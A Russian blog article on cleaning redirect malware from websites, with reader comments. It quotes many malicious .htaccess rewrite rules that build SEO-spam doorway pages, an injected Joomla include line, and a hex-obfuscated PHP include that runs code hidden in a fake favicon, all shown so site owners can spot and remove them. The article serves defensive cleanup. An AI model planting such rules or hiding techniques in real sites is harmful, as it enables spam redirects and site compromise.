Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам - это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов. 

Удаление вируса редиректа на сайте
Удаление вируса редиректа на сайте

В данной статье я рассмотрю основные варианты встраивания вирусных редиректов. 

Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!

Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.

В первую очередь ищем вставки кода в файлы .htaccess, особенно в корне сайта

Все что связано с Rewrite стоит проверить, куда перенаправляет.

Ниже я приведу пару вредоносных вставок - которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами - тут много названий):

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^\d\/]+)([^\d\/]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%([^\d\/]+)(.*)%(.*)[0-9]+%(.*)[0-9]+%(.*)(.*)%([^\d\/]+)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%([^\d\/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%(.*)[0-9]+%(.*)[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%(.*)(.*)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+F%(.*)F%(.*)[0-9]+%[0-9]+%([^\d\/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)([^\d\/]+)%[0-9]+\/.*..*$ ?$65$39=$62&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*-.*-F.*-([^\d\/]+).*-[0-9]+..*$ ?$7$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)([0-9]+)%[0-9]+([0-9]+)[0-9]+%[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^\d\/]+)-.*-[0-9]+..*$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+.*[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*[0-9]+N.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+.*[0-9]+F.*W[0-9]+.*[0-9]+.*F[0-9]+ZW.*HR.*(.*)--$ ?$2$10=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+N.*YXJ.*HJ.*WF.*[0-9]+.*Y[0-9]+.*(.*).*R.*Y.*V.*[0-9]+Q.*$ ?$2$1=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*([0-9]+).*L[0-9]+.*[0-9]+.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+-$ ?$2$8=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*F[0-9]+ZW.*WF.*[0-9]+.*Y[0-9]+.*(.*).*ZG[0-9]+.*ZXN[0-9]+.*WN.*ZH(.*).*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*-.*%[0-9]+F$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-[0-9]+-.*-.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)_[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+-.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-.*-V.*%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*&.*=.*\:\/.*-[0-9]+..*\/.*-.*-.*-.*-.*-.*\/&.*=[0-9]+K([^\d\/]+)&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=.*\:\/.*[0-9]+..*..*..*\/.*\?.*=OIP.(.*).*U.*[0-9]+.*([0-9]+).*U.*[0-9]+.*[0-9]+V[0-9]+.*Q(.*).*([0-9]+).*&.*=[0-9]+.[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*$ ?$148$146=$147&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)&.*=[0-9]+&.*=[0-9]+$ ?$11$1=$10&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/.*-.*\/[0-9]+\/.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/.*\/[0-9]+\/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+\/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]++%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+.*[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*\/.*\/[0-9]+\/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)&.*=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*\/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+%([0-9]+)[0-9]+%([^\d\/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^\d\/]+)\/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+\/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/\?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*\/$ ?$1$3=$2&%{QUERY_STRING}[L]

Если увидите что-то подобное - смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS - там не будет находиться вирус!

Обычно редиректы прописывают для запросов с мобильных и планшетов:

android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков

как и для переходов с поисковых систем:

yandex|google|mail|rambler|vk.com

Если этот пункт не помог, то стоит обратить внимание на код страницы - порой часто редирект добавляют через Javascript

Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.

Обязательно проверяйте индексные файлы и папку шаблона - это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php - в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require.

Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.

К примеру, в последнее время встречаю не один сайт на джумле ( в частности на Joomla 2.5), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка

require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");

Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php

В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.

Комментарии   
+2 # Надежда 27.06.2016 04:54
Может лучше программу айболит запустить? Сайт моего клиента именно так вылечил хостер
Ответить | Ответить с цитатой | Цитировать
+4 # Protect Your Site 27.06.2016 06:10
Надо понимать, что такой вариант лечения может в зависимости от настроек ( на хостинге скорее всего будут упрощенные) удалить или не все ирусы, или удалить лишние файлы. Кроме этого, удаление вирусов без устранения уязвимости - это дохлый номер, через пару дней можно будет снова удалять по новой!
Ответить | Ответить с цитатой | Цитировать
0 # Виктор 04.01.2017 10:47
У меня ситуация следующая на сайте клиента появился вирус редирект, сайт на WordPress, появилась куча левых страниц в выдаче, при переходе по которым они редиректят на сайт essayoneday.com , как вылечить помогите пожалуйста...
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 04.01.2017 11:24
Если не знаете как, то можете заказать услугу чистки сайта и ваш сайт будет быстро защищен.
Ответить | Ответить с цитатой | Цитировать
0 # Влад 14.02.2017 19:39
Именно ТАМ и БЫЛ КОД!!!!!!!!!!! Спасибо!!! Вы супер!!!!
Ответить | Ответить с цитатой | Цитировать
0 # руслан 01.04.2017 12:30
У меня такая фигня произошла с сайтом. Сделал бекап, но даже он не помог решить проблему. В чем дело, не понимаю..
Ответить | Ответить с цитатой | Цитировать
0 # Protect Your Site 01.04.2017 18:10
Что подробнее и почему бекап должен исправить проблему? Распространенна я ошибка надеяться на резервную копию, надо исправлять корень проблемы - закрывать уязвимость и удалять вирусы, а потом желательно накатить ещё защиту, и тогда хакеры не позарятся на Ваш сайт.
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 10:20
У меня в папке «aiowps_backups » в файле «.htaccess.back up» странный код:
«@include «\x2fho\x73ti\x 6eg/\x74eh\x6eo h\x65l/\……и т.д.»
как вы думаете. это вирус?
Перенаправление идут на другие сайты и не могу найти где эта зараза сидит. Сайт на WP
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 10:26
Очень похоже на то, с учетом, что символом @ подавление ошибок делается, дабы не вызывать подозрений.
В самую первую очередь проверяйте файлы шаблона и wp-blog-header. php
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 11:20
Спасибо за быстрый ваш ответ!
Извиняюсь, а Вы не знаете, как можно раскодировать этот код и посмотреть, что было там прописано? Хочу узнать на какие файлы он ссылается еще
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 11:29
Вышлите на почту в архиве файл, здесь посторонний код просто обрежется.
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:01
Да, не, вроде как не режиться код:
Код:@include "\x2fho\x73ti\x6eg/\x74eh\x6eoh\x65l/\x64at\x61/w\x77w/\x74eh\x6eoh\x65lp\x2eco\x6d.u\x61/w\x70-i\x6ecl\x75de\x73/R\x65qu\x65st\x73/R\x65sp\x6fns\x65/f\x61vi\x63on\x5f7e\x62f8\x33.i\x63o";
Ответить | Ответить с цитатой | Цитировать
+2 # Protect Your Site 18.04.2017 12:15
/hosting/****** ***/data/www/si te/wp-includes/ Requests/Respon se/favicon_7ebf 83.ico
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:20
Спасибо! Если не секрет, как Вы перекодировали?
Ответить | Ответить с цитатой | Цитировать
+2 # Protect Your Site 18.04.2017 12:27
Заменил @include на echo и вызвал скрипт)
Ответить | Ответить с цитатой | Цитировать
+1 # Коля 18.04.2017 12:31
хм, так все просто оказалось ))) А я тут мудрю.
Но мне все равно не понятно, зачем вирусу создавать фавикон и потов размещать на сайте?
Это мой последний вопрос, и так я очень сильно Вам благодарен за потраченное Вами время на меня!
Ответить | Ответить с цитатой | Цитировать
+2 # Protect Your Site 18.04.2017 12:35
Проверьте содержимое файла wp-includes/Req uests/Response/ favicon_7ebf83. ico - многие антивирусы игнорируют изображения для проверки. А через функцию include без разницы в каком расширении подключать файл, если там будет исполняемый код, то он запустится.
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 12:54
Да, вы правы, открыл блокнотом фавикон и там был прописан вирус в закодированном виде "64_decode".
Спасибо! Буду теперь искать каким образом все это туда попало
Еще раз спасибо!
Ответить | Ответить с цитатой | Цитировать
0 # Коля 18.04.2017 11:17
Спасибо!
Вы имеете ввиду проверить тему?
Если проверить файлы темы, то там был один лишний файлик "proxi.php".
Ответить | Ответить с цитатой | Цитировать
+1 # Protect Your Site 18.04.2017 11:23
Проверять надо все файлы на сайте, а если сайтов несколько на аккаунте, то и все сайты.
К файлам темы надо тщательнее отнестись и лучше вручную открыть и просмотреть код, обратить внимание на подключение внешних файлов через include и require
Ответить | Ответить с цитатой | Цитировать
0 # Natalya 23.06.2017 17:06
У меня был такой! Один в один, он и еще и размножался сам. Не знала, как победить его. Вычищала и руками, и муж бекап делал, и к хостеру обращались. Они тоже чистили своими способами. Наконец, ушло. Теперь даже в админку боюсь сама входить - фобия на вирусы появилась :-)
Ответить | Ответить с цитатой | Цитировать
Добавить комментарий